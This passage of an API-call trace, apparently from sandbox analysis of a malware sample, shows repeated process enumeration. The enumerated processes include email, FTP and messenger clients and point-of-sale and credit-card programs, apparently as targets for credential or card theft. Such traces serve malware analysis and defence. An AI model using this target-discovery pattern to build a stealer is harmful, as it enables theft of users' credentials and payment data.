th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0222.068] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0222.071] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0222.073] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0222.075] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0222.077] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0222.080] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0222.082] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0222.085] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0222.087] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0222.091] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0222.096] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0222.098] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0222.100] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0222.102] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0222.105] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0222.108] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0222.110] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0222.115] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0222.118] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0222.121] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0222.123] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0222.127] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0222.133] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0222.136] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0222.138] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0222.141] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0222.144] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0222.166] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0222.170] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0222.172] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0222.177] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0222.179] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0222.182] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0222.185] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.187] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0222.192] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.195] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.197] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0222.200] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.203] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0222.205] CloseHandle (hObject=0x2190) returned 1 [0222.205] Sleep (dwMilliseconds=0x64) [0222.322] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21cc [0222.338] Process32First (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.340] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.342] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.344] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.345] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.347] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.349] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.351] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.353] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.355] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.357] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.404] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.407] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.410] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.412] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.414] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.417] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.421] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.424] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.426] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.429] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0222.432] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.434] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0222.437] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.440] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0222.483] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0222.486] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0222.489] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0222.492] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.496] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0222.498] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.500] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.502] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0222.505] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.507] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.509] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.512] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.514] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0222.517] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0222.632] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0222.634] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0222.636] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0222.638] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0222.640] Process32Next (in: hSnapshot=0x21cc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, 